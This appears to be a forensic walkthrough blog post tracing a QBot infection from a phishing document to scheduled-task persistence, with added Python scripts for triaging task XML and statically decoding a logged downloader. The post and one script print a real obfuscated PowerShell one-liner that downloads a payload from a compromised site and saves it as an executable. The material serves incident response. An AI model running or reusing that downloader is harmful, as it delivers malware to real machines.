For some reason, there are not many posts on the forensic examination of hosts infected with different malware families. We decided to change this and start a new series – Forensic Walkthrough.
Today’s guest is QBot (QakBot). It was first discovered in 2009 and mainly targeted browsing data related to banking websites. Its worm-like capabilities allow it to spread through networks, so you may find a bunch of infected hosts during your investigations. What’s more, it was suspected to be used by MegaCortex ransomware operators – “big game hunters” targeting large enterprises.
So we have a memory dump and a bitstream image of a compromised host. Let’s see what we can find!
Volatility has a bunch of plugins that are very useful for incident response examinations. Let’s start with pstree, a plugin that builds a process tree. We can immediately see some suspicious processes:
So here we have a process with a suspicious name, egvmxii.exe, started by Windows Explorer (explorer.exe). Something must be wrong with it. Ok, let’s continue to collect low-hanging fruit. Our potentially rogue process’ parent PID is 4000, so let’s run malfind against it, a plugin capable of finding hidden or injected code in user-mode memory.
So, something injected its code into the legitimate Windows Explorer process (explorer.exe with PID 4000). Ok, good, let’s look inside our bitstream image. Remember schtasks.exe spawned by explorer.exe? It’s the Task Scheduler command-line tool. A-a-and, what can it be used for? Creating scheduled tasks, which are a quite common persistence mechanism.
So let’s start by looking inside C:\Windows\System32\Tasks. One of the tasks is quite suspicious:
So, what does it run? Here is the answer:
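Reading one task XML by hand is fine for a single host, but QBot spreads, so the same lookup usually has to be repeated across many exported Tasks folders. The script below is an added example (not code from the original post) that walks an exported copy of C:\Windows\System32\Tasks, pulls the Exec action and trigger type out of every task definition, and flags tasks whose binary lives outside the system directories or whose arguments point at a user-writable path. The two task definitions embedded in it are constructed for the demo; the path of the randomly named executable is an assumption, since the post does not give it.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Namespace Windows writes into every task definition under System32\Tasks.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Where a legitimately scheduled binary normally lives; anything else is worth a look.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# User-writable locations that malware can drop into without admin rights.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")

# Constructed task definitions (not taken from the compromised host). Windows stores
# these files as UTF-16 LE with a BOM; write_sample_tasks() reproduces that.
SAMPLE_TASKS = {
    # Looks like the bulk of what sits under System32\Tasks: system binary, timed trigger.
    "Microsoft\\Windows\\ConstructedBenign": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><StartBoundary>2020-04-01T12:00:00</StartBoundary></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>%SystemRoot%\system32\svchost.exe</Command><Arguments>-k netsvcs</Arguments></Exec></Actions>
</Task>""",
    # Modelled on the task in the write-up: a randomly named executable run at logon.
    # The path is an assumption made for this example; the post does not state it.
    "ConstructedSuspicious": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\Users\victim\AppData\Roaming\Constructed\egvmxii.exe</Command></Exec></Actions>
</Task>""",
}


def normalize(path):
    """Lower-case a command string and expand the common Windows variables by hand;
    os.path.expandvars would only know the analyst machine's own variables."""
    p = path.strip().strip('"').lower()
    for var, val in (("%systemroot%", "c:\\windows"), ("%windir%", "c:\\windows"),
                     ("%programfiles%", "c:\\program files")):
        p = p.replace(var, val)
    return p


def parse_task(xml_data):
    """Return (command, arguments, trigger types) from one task definition (str or bytes),
    or None when the task has no Exec action (COM handler / e-mail actions are ignored)."""
    root = ET.fromstring(xml_data)
    exec_node = root.find(".//t:Actions/t:Exec", NS)
    if exec_node is None:
        return None
    cmd = exec_node.findtext("t:Command", default="", namespaces=NS)
    args = exec_node.findtext("t:Arguments", default="", namespaces=NS)
    trig = root.find("t:Triggers", NS)
    triggers = [] if trig is None else [c.tag.split("}")[-1] for c in trig]
    return cmd, args, triggers


def triage_task(name, xml_data):
    """Classify a single task; returns a dict with a 'suspicious' verdict and the reasons."""
    parsed = parse_task(xml_data)
    if parsed is None:
        return {"task": name, "suspicious": False, "reasons": ["no Exec action"]}
    cmd, args, triggers = parsed
    ncmd, nargs = normalize(cmd), normalize(args)
    reasons = []
    if not ncmd.startswith(TRUSTED_PREFIXES):
        reasons.append("command outside trusted directories")
    if any(w in nargs for w in USER_WRITABLE):
        reasons.append("arguments reference a user-writable path")
    return {"task": name, "command": cmd, "arguments": args, "triggers": triggers,
            "suspicious": bool(reasons), "reasons": reasons}


def triage_task_dir(task_dir):
    """Walk an exported Tasks folder and triage every file; bytes go straight to the
    parser so expat picks the UTF-16 encoding up from the BOM."""
    results = []
    for dirpath, _, files in os.walk(task_dir):
        for fname in files:
            full = os.path.join(dirpath, fname)
            with open(full, "rb") as fh:
                results.append(triage_task(os.path.relpath(full, task_dir), fh.read()))
    return results


def write_sample_tasks(dest):
    """Write the constructed samples the way Windows stores them (UTF-16 LE with BOM)."""
    for rel, xml_text in SAMPLE_TASKS.items():
        path = os.path.join(dest, *rel.split("\\"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(('<?xml version="1.0" encoding="UTF-16"?>' + xml_text).encode("utf-16"))


def demo():
    """Write the constructed samples to a temp folder and triage it, as you would an export."""
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_tasks(tmp)
        return sorted(triage_task_dir(tmp), key=lambda r: r["task"])


if __name__ == "__main__":
    for r in demo():
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['task']}: {r.get('command', '')} {r.get('arguments', '')} {r['reasons']}")
```

Point triage_task_dir() at a Tasks folder copied out of the mounted image and the randomly named binary under a user profile stands out immediately; a trusted-path check is deliberately loose here, since a task that runs a system binary with arguments pointing into a user profile is just as interesting, which is why the arguments are checked separately.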
Oh, egvmxii.exe, we have already seen it, right? Let’s look at its timestamps – we can use them as a pivot point:
So, the file was created at 15:37:25 UTC. Let’s look at events around this time. If we look inside PowerShell.evtx, we can easily spot quite an interesting string in the logs:
powershell -Command (New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NvbGxpZ2h0LmNvbS5oay93cC1jb250ZW50L3VwbG9hZHMvMjAyMC8wNC9sYXN0LzQ0NDQ0NC5wbmc=')),[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')
What happens here? PowerShell is used to download 444444.png from hxxp://sollight[.]com.hk/wp-content/uploads/2020/04/last/, a compromised website, and save it as file1.exe under C:\Users\Public\tmpdir\.
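The decoding above was done by hand; the same Base64 wrapping and string-splitting shows up in almost every maldoc-launched PowerShell downloader, so it pays to script it. The following is an added example (not code from the original post) that reconstructs the URL and drop path statically from the logged command line: it inlines every GetString(FromBase64String('...')) as a literal, splits the DownloadFile() argument list on commas outside quotes, joins the '+'-concatenated fragments, and defangs the URL for the report. Nothing is executed or fetched. The regex assumes the decoder is spelled with [System.Text.Encoding]::ASCII or UTF8 and single-quoted literals, which is what this sample uses; other spellings would need extra patterns.

```python
import base64
import re
from urllib.parse import urlsplit

# The command line recovered from PowerShell.evtx in the write-up, with straight quotes.
COMMAND = (
    "powershell -Command (New-Object Net.WebClient).DownloadFile("
    "[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("
    "'aHR0cDovL3NvbGxpZ2h0LmNvbS5oay93cC1jb250ZW50L3VwbG9hZHMvMjAyMC8wNC9sYXN0LzQ0NDQ0NC5wbmc=')),"
    "[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("
    "'QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')"
)

# GetString(FromBase64String('...')) as it appears in this sample. Assumption: ASCII or
# UTF8 decoder and a single-quoted literal; other spellings are not matched.
B64_WRAPPED = re.compile(
    r"\[System\.Text\.Encoding\]::(?:ASCII|UTF8)\.GetString\("
    r"\[System\.Convert\]::FromBase64String\('([A-Za-z0-9+/=]+)'\)\)"
)


def inline_base64(cmd):
    """Replace every wrapped Base64 blob with its decoded text as a quoted literal."""
    def repl(m):
        decoded = base64.b64decode(m.group(1)).decode("ascii")
        return "'" + decoded.replace("'", "''") + "'"
    return B64_WRAPPED.sub(repl, cmd)


def split_args(arglist):
    """Split an argument list on commas that sit outside single quotes and parentheses."""
    args, cur, depth, in_quote = [], [], 0, False
    for ch in arglist:
        if ch == "'":
            in_quote = not in_quote
        elif not in_quote:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == "," and depth == 0:
                args.append("".join(cur))
                cur = []
                continue
        cur.append(ch)
    args.append("".join(cur))
    return args


def join_literals(expr):
    """Evaluate an expression made only of quoted literals joined with '+'
    (the '1' + '.e' + 'x' + 'e' trick used to hide the .exe extension)."""
    return "".join(re.findall(r"'([^']*)'", expr))


def extract_downloadfile(cmd):
    """Return (url, local_path) from a (New-Object Net.WebClient).DownloadFile(a, b)
    call, or None when the command line contains no such call."""
    cmd = inline_base64(cmd)
    m = re.search(r"\.DownloadFile\((.*)\)\s*$", cmd)
    if m is None:
        return None
    url, path = [join_literals(a) for a in split_args(m.group(1))]
    return url, path


def defang(url):
    """Render a URL so it cannot be clicked or auto-linked in a report."""
    parts = urlsplit(url)
    host = parts.netloc.replace(".", "[.]")
    query = "?" + parts.query if parts.query else ""
    return parts.scheme.replace("http", "hxxp") + "://" + host + parts.path + query


def report(cmd):
    """Indicator summary for one logged command line, ready to paste into notes."""
    found = extract_downloadfile(cmd)
    if found is None:
        return {"downloader": None}
    url, path = found
    return {"downloader": "Net.WebClient.DownloadFile", "url": defang(url), "local_path": path}


if __name__ == "__main__":
    for key, value in report(COMMAND).items():
        print(f"{key:12} {value}")
```

The output is the same URL and C:\Users\Public\tmpdir\file1.exe path the write-up arrived at by hand, and the local path is exactly what the Prefetch check in the next step needs to confirm.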
Ok, let’s try to find evidence of execution. The Prefetch folder is a good place to start. And here we go – FILE1.EXE-46CF3340.pf:
So, it was first executed at 15:37:23 (UTC). If we look at another file, EGVMXII.EXE-EAA08D18.pf, we can see that egvmxii.exe was first executed 7 seconds later – at 15:37:30 (UTC). Great, looks like we found the source of infection, right? But what executed PowerShell? Let’s find out!
Recent files may be of great help. And here we go, it looks like Operating Agreement_1.doc was opened a few seconds before PowerShell was started:
Let’s collect more information about this file. For example, we can search for its name. And yes, we get a bunch of results!
The most interesting hit is in the Microsoft Edge downloads history. Now we know that the file was originally downloaded as Operating Agreement_1.zip from OneDrive:
Good ol’ phishing link – nice find! But that’s not all! If we look inside the Windows Defender log, we can find more: the extracted file was detected as TrojanDownloader:O97M/Obfuse.RDU!MTB. But it seems it was too late.
Ok, now we know that our victim downloaded an archive with a weaponized Microsoft Office document from a phishing link, opened it, and it led to a QBot infection. We also found out that QBot used scheduled tasks for persistence. But was it the only persistence mechanism used? Let’s run another keyword search, this time using egvmxii.exe as the keyword.
And yes, there is another persistence mechanism:
Of course, this is not the whole set of forensic artifacts you can find when dealing with QBot infections, but there are quite a few. As always, happy forensicating!